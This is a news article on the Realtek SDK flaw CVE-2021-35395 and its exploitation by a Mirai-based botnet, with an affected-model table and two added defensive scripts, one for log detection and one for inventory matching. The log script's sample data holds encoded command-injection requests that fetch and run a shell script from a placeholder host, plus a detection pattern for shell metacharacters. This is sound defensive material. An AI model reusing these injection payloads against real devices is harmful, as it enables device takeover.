Hundreds of thousands of Realtek-based devices under attack from IoT botnet
A dangerous vulnerability in the software development kit that ships with Realtek chipsets, used in hundreds of thousands of smart devices from at least 65 vendors, is currently under attack from a notorious DDoS botnet gang.
The attacks started last week, according to a report from IoT security firm SAM, and began just three days after fellow security firm IoT Inspector published details about the vulnerability on its blog.
Vulnerability impacts little-known but very popular Realtek SoC
Tracked as CVE-2021-35395, the vulnerability is one of four issues IoT Inspector researchers found in the software development kit (SDK) that ships with multiple Realtek chipsets (SoCs).
Realtek manufactures these chips and sells them to other companies, which build their own devices around the SoC and use the Realtek SDK, web configuration interface included, as the starting point for their own firmware.
IoT Inspector said they found more than 200 different device models from at least 65 different vendors that had been built around these chips and were using the vulnerable SDK.
Estimated at hundreds of thousands of internet-connected devices, the affected products include routers, network gateways, Wi-Fi repeaters, IP cameras, smart lighting, and even internet-connected toys.
Of the four issues discovered by the IoT Inspector research team, CVE-2021-35395 received the highest severity rating, 9.8 out of 10 on the CVSSv3 scale.
According to the research team, the vulnerability resides in the web management interface that the SDK provides for configuring the device. By sending malformed parameters in the URL of a request to that interface, a remote attacker can bypass authentication and run code with the highest privileges, effectively taking over the device. No credentials are needed, so any device whose management interface is reachable from the attacker's network position, including the internet, is a target.
Realtek released patches before IoT Inspector published its findings last week, but that window was far too short for device vendors to integrate the fix into their own firmware and push updates down the line to their customers.
This means that today the vast majority of these devices are still running outdated firmware (and an outdated Realtek SDK) and remain exposed to attack.
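The attack pattern described above, malformed parameters sent to the device's web configuration interface, leaves a recognisable trace wherever requests to that interface are logged. The script below is an added example and not code from the article, IoT Inspector or SAM: it parses Common Log Format lines, flags query parameters that carry shell metacharacters (the command-injection shape) or overlong values (the overflow shape), and groups hits by source address. The log lines, paths, parameter names and addresses are constructed for illustration and are not the endpoints of any real advisory.

```python
"""Flag HTTP requests to an embedded device's web management interface whose
query parameters look malformed (shell metacharacters or overlong values),
then group the hits by source address to separate scanners from users.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Common Log Format: client, identd, user, [time], "request", status, size
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Characters that let a value escape into a shell when a CGI handler passes it
# to system()/popen(): separators, pipes, redirects, backtick and $( ) / ${ }.
SHELL_META_RE = re.compile(r'[;|&`<>]|\$\(|\$\{')


def parse_clf(line):
    """Return a dict for one CLF line, or None if the line does not match."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None


def suspicious_params(target, max_len=128):
    """Yield (name, reason) for each query parameter that looks malformed."""
    parts = urlsplit(target)
    # keep_blank_values so 'name=' still counts; parse_qsl percent-decodes
    # once, the extra unquote catches double-encoded payloads.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = unquote(value)
        if SHELL_META_RE.search(value):
            yield name, "shell-metacharacters"
        elif len(value) > max_len:
            yield name, "overlong-value"


def analyze(log_lines, max_len=128):
    """Return one finding per suspicious parameter across all log lines."""
    findings = []
    for line in log_lines:
        rec = parse_clf(line)
        if rec is None:  # not CLF, skip rather than guess
            continue
        for name, reason in suspicious_params(rec["target"], max_len):
            findings.append({
                "ip": rec["ip"],
                "path": urlsplit(rec["target"]).path,
                "param": name,
                "reason": reason,
                "status": rec["status"],
            })
    return findings


def noisy_sources(findings, min_hits=2):
    """Source addresses with at least min_hits findings: likely mass scanning."""
    counts = Counter(f["ip"] for f in findings)
    return sorted(ip for ip, n in counts.items() if n >= min_hits)


# Constructed sample log. Paths, parameter names and addresses are invented
# for this example and are not the endpoints of any real advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Aug/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 1432',
    '192.0.2.10 - - [22/Aug/2021:10:01:05 +0000] "GET /status.htm?page=1 HTTP/1.1" 200 980',
    '198.51.100.7 - - [22/Aug/2021:10:02:11 +0000] '
    '"GET /setup.cgi?name=%60wget%20http%3A%2F%2F203.0.113.5%2Fa.sh%60 HTTP/1.1" 200 0',
    '198.51.100.7 - - [22/Aug/2021:10:02:12 +0000] '
    '"GET /setup.cgi?name=x%3Bcd%20%2Ftmp%3Bsh%20a.sh HTTP/1.1" 200 0',
    '198.51.100.7 - - [22/Aug/2021:10:02:14 +0000] '
    '"GET /login.cgi?user=' + "A" * 300 + ' HTTP/1.1" 500 0',
    'garbage line that is not CLF',
]

if __name__ == "__main__":
    found = analyze(SAMPLE_LOG)
    for f in found:
        print(f"{f['ip']:14} {f['path']:12} param={f['param']} {f['reason']} status={f['status']}")
    print("noisy sources:", noisy_sources(found))
```

Two caveats a practitioner would add: many embedded web servers do not log at all, so the same check is more useful on a packet capture or on a proxy placed in front of the device; and a legitimate configuration form can carry a `;` or `&` in a value, so the per-source count, not the single hit, is what separates a scanner from a user.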
A very busy botnet
Per SAM, exploitation started shortly after publication and came from the same Mirai-based botnet that, a week earlier, had rushed to exploit a similar mass-scale bug in millions of routers running Arcadyan-based firmware.
Based on its own scans, the SAM research team said the most common device models currently running the vulnerable Realtek SDK include:
- Netis E1+ extender
- Edimax N150 and N300 Wi-Fi router
- Repotec RP-WR5444 router
Owners of such devices should check with their vendor or seller for new firmware. The full list of affected vendors and models is included below:
Manufacturer | Affected Models |
---|---|
A-Link Europe Ltd | A-Link WNAP, WNAP(b) |
ARRIS Group, Inc | VAP4402_CALA |
Airlive Corp. | WN-250R, WN-350R |
Abocom System Inc. | Wireless Router ? |
AIgital | Wifi Range Extenders |
Amped Wireless | AP20000G |
Askey | AP5100W |
ASUSTek Computer Inc. | RT-Nxx models, WL330-NUL, Wireless WPS Router RT-N10E, Wireless WPS Router RT-N10LX, Wireless WPS Router RT-N12E, Wireless WPS Router RT-N12LX |
BEST ONE TECHNOLOGY CO., LTD. | AP-BNC-800 |
Beeline | Smart Box v1 |
Belkin | F9K1015, AC1200DB Wireless Router F9K1113 v4, AC1200FE Wireless Router F9K1123, AC750 Wireless Router F9K1116, N300WRX, N600DB |
Buffalo Inc. | WEX-1166DHP2, WEX-1166DHPS, WEX-300HPS, WEX-733DHPS, WMR-433, WSR-1166DHP3, WSR-1166DHP4, WSR-1166DHPL, WSR-1166DHPL2 |
Calix Inc. | 804Mesh |
China Mobile Communication Corp. | AN1202L |
Compal Broadband Networks, INC. | CH66xx cable modem line |
D-Link | DIR-XXX models based on rlx-linux, DAP-XXX models based on rlx-linux, DIR-300, DIR-501, DIR-600L, DIR-605C, DIR-605L, DIR-615, DIR-618, DIR-618b, DIR-619, DIR-619L, DIR-809, DIR-813, DIR-815, DIR-820L, DIR-825, DIR-825AC, DIR-825ACG1, DIR-842, DAP-1155, DAP-1155 A1, DAP-1360 C1, DAP-1360 B1, DSL-2640U, DSL-2750U, DSL_2640U, VoIP Router DVG-2102S, VoIP Router DVG-5004S, VoIP Router DVG-N5402GF, VoIP Router DVG-N5402SP, VoIP Router DVG-N5412SP, Wireless VoIP Device DVG-N5402SP |
DASAN Networks | H150N |
Davolink Inc. | DVW2700, DVW2700L |
Edge-core | VoIP Router ECG4510-05E-R01 |
Edimax | RE-7438, BR6478N, Wireless Router BR-6428nS, N150 Wireless Router BR6228GNS, N300 Wireless Router BR6428NS, BR-6228nS/nC |
Edison | unknown |
EnGenius Technologies, Inc. | 11N Wireless Router Wireless AP Router |
ELECOM Co.,LTD. | WRC-1467GHBK, WRC-1900GHBK, WRC-300FEBK-A, WRC-733FEBK-A |
Esson Technology Inc. | Wifi Module ESM8196, https://fccid.io/RKOESM8196 (therefore any device using this wifi module) |
EZ-NET Ubiquitous Corp. | NEXT-7004N |
FIDA | PRN3005L D5 |
Hama | unknown |
Hawking Technologies, Inc. | HAWNR3 |
I-O DATA DEVICE, INC. | WN-AC1167R, WN-G300GR |
iCotera | i6800 |
IGD | 1T1R |
LG International | Axler Router LGI-R104N, Axler Router LGI-R104T, Axler Router LGI-X501, Axler Router LGI-X502, Axler Router LGI-X503, Axler Router LGI-X601, Axler Router LGI-X602, Axler Router RT-DSE |
LINK-NET TECHNOLOGY CO., LTD. | LW-N664R2, LW-U31, LW-U700 |
Logitec | BR6428GNS, LAN-W300N3L |
MMC Technology | MM01-005H, MM02-005H |
MT-Link | MT-WR600N, MT-WR730N, MT-WR760N, MT-WR761N, MT-WR761N+, MT-WR860N |
NetComm Wireless | NF15ACV |
Netis | WF2411, WF2411I, WF2411R, WF2419, WF2419I, WF2419R, WF2681 |
Netgear | N300R |
Nexxt Solutions | AEIEL304A1, AEIEL304U2, ARNEL304U1 |
Observa Telecom | RTA01 |
Occtel | VoIP Router ODC201AC, VoIP Router OGC200W, VoIP Router ONC200W, VoIP Router SP300-DS, VoIP Router SP5220SO, VoIP Router SP5220SP |
Omega Technology | Wireless N Router O31 OWLR151U, Wireless N Router O70 OWLR307U |
PATECH | Axler RT-TSE, Axler Router R104, Axler Router R3, Axler Router X503, Axler Router X603, LotteMart Router 104L, LotteMart Router 502L, LotteMart Router 503L, Router P104S, Router P501 |
PLANEX COMMUNICATIONS INC. / Planex Communications Corp. | MZK-MF300N, MZK-MR150, MZK-W300NH3, MZK-W300NR, MZK-WNHR |
PLANET Technology | VIP-281SW |
Realtek | RTL8196C EV-2009-02-06, RTL8xxx EV-2009-02-06, RTL8xxx EV-2010-09-20, RTL8186 EV-2006-07-27, RTL8671 EV-2006-07-27, RTL8671 EV-2010-09-20, RTL8xxx EV-2006-07-27 |
Revogi Systems | |
Sitecom Europe BV | Sitecom Wireless Gigabit Router WLR-4001, Sitecom Wireless Router 150N X1 150N, Sitecom Wireless Router 300N X2 300N, Sitecom Wireless Router 300N X3 300N |
Skystation | CWR-GN150S |
Sercomm Corp. | Telmex Infinitum |
Shaghal Ltd. | ERACN300 |
Shenzhen Yichen (JCG) Technology Development Co., Ltd. | JYR-N490 |
Skyworth Digital Technology. | Mesh Router |
Smartlink | unknown |
TCL Communication | unknown |
Technicolor | TD5137 |
Telewell | TW-EAV510 |
Tenda | AC6, AC10, W6, W9, i21 |
Totolink | A300R |
TRENDnet, Inc. / TRENDnet Technology, Corp. | TEW-651BR, TEW-637AP, TEW-638APB, TEW-831DR |
UPVEL | UR-315BN |
ZTE | MF253V, MF910 |
Zyxel | P-330W X150N NBG-2105 NBG-416N AP Router NBG-418N AP Router WAP6804 |
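Matching an asset inventory against a list like the one above is harder than it looks: the same model is written BR6428NS in one cell and BR-6428nS in another, some entries are wildcards (DIR-XXX, RT-Nxx), and some fold two variants into one token (BR-6228nS/nC). The script below is an added example, not a tool from IoT Inspector or SAM: it normalises model codes on both sides, expands the wildcards and the slash variants, and shortlists inventory entries that hit the list. Only a handful of rows are transcribed from the table; the inventory hostnames and models are constructed for the example.

```python
"""Match an asset inventory against the affected-model table, tolerating the
inconsistent spelling of model names (hyphens, case, descriptive words,
'/'-separated variants) and wildcard entries such as DIR-XXX or RT-Nxx.
"""
import re

# A few rows transcribed from the table above; the whole table can be pasted
# in the same "Vendor | model, model, ..." shape.
ADVISORY_ROWS = [
    "ASUSTek Computer Inc. | RT-Nxx models, WL330-NUL, Wireless WPS Router RT-N10E",
    "D-Link | DIR-XXX models based on rlx-linux, DIR-300, DIR-615, DAP-1360 B1",
    "Edimax | BR6478N, N150 Wireless Router BR6228GNS, BR-6228nS/nC",
    "Netis | WF2411, WF2419, WF2681",
    "Realtek | RTL8196C EV-2009-02-06, RTL8xxx EV-2010-09-20",
    "Tenda | AC6, AC10, W6, W9, i21",
]

WILDCARD_RE = re.compile(r"X{2,}$")  # trailing xx/XXX placeholder in a model code


def normalize(token):
    """Canonical key: uppercase with everything but letters and digits removed."""
    return re.sub(r"[^0-9A-Z]", "", token.upper())


def expand_variants(token):
    """'BR-6228nS/nC' -> ['BR-6228nS', 'BR-6228nC']: a '/'-part without digits
    is a suffix on the stem (first part with trailing letters stripped)."""
    parts = token.split("/")
    stem = re.sub(r"[A-Za-z]+$", "", parts[0])
    return [parts[0]] + [p if re.search(r"\d", p) else stem + p for p in parts[1:]]


def model_tokens(text):
    """Yield tokens that look like model codes: they contain a digit or end in a
    wildcard. Descriptive words (Wireless, Router, models, ...) are dropped."""
    for raw in re.split(r"[\s,]+", text):
        for tok in expand_variants(raw):
            if re.search(r"\d", tok) or WILDCARD_RE.search(tok.upper()):
                yield tok


def build_index(rows):
    """exact: key -> (vendor, listed token); wild: [(regex, vendor, listed token)]"""
    exact, wild = {}, []
    for row in rows:
        vendor, _, models = row.partition("|")
        vendor = vendor.strip()
        for tok in model_tokens(models):
            key = normalize(tok)
            m = WILDCARD_RE.search(key)
            if m:  # DIR-XXX -> ^DIR[0-9A-Z]+$
                pat = re.compile("^" + re.escape(key[:m.start()]) + r"[0-9A-Z]+$")
                wild.append((pat, vendor, tok))
            else:
                exact.setdefault(key, (vendor, tok))
    return exact, wild


def lookup(key, exact, wild):
    """Exact key first, then wildcard patterns; None when nothing matches."""
    if key in exact:
        vendor, listed = exact[key]
        return vendor, listed, "exact"
    for pat, vendor, listed in wild:
        if pat.match(key):
            return vendor, listed, "wildcard"
    return None


def find_affected(inventory, rows=ADVISORY_ROWS):
    """inventory: [(hostname, free-text model)] -> [(host, vendor, listed, how)]"""
    exact, wild = build_index(rows)
    hits = []
    for host, model in inventory:
        for tok in model_tokens(model):
            found = lookup(normalize(tok), exact, wild)
            if found:
                hits.append((host,) + found)
                break  # one hit per asset is enough for a shortlist
    return hits


# Constructed inventory; hostnames and model strings are made up for the example.
INVENTORY = [
    ("branch-rtr-01", "ASUS RT-N12E"),       # only the RT-Nxx wildcard covers it
    ("lab-ap-02", "D-Link DIR-615 rev B"),    # listed literally
    ("guest-wifi", "Edimax BR-6228nC"),       # the /nC variant, expanded
    ("core-sw-01", "Cisco WS-C2960X-48"),     # not a Realtek-based device
    ("home-ext", "Tenda AC10 v3"),            # listed literally
]

if __name__ == "__main__":
    for host, vendor, listed, how in find_affected(INVENTORY):
        print(f"{host:14} affected: {vendor} {listed} ({how})")
```

Digit-bearing tokens inside descriptive text (the N150 in "N150 Wireless Router") also become keys, so a hit on such a key deserves a manual look; the script is meant to shortlist devices for a firmware check, not to certify them.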
Catalin Cimpanu is a cybersecurity reporter who previously worked at ZDNet and Bleeping Computer, where he became a well-known name in the industry for his constant scoops on new vulnerabilities, cyberattacks, and law enforcement actions against hackers.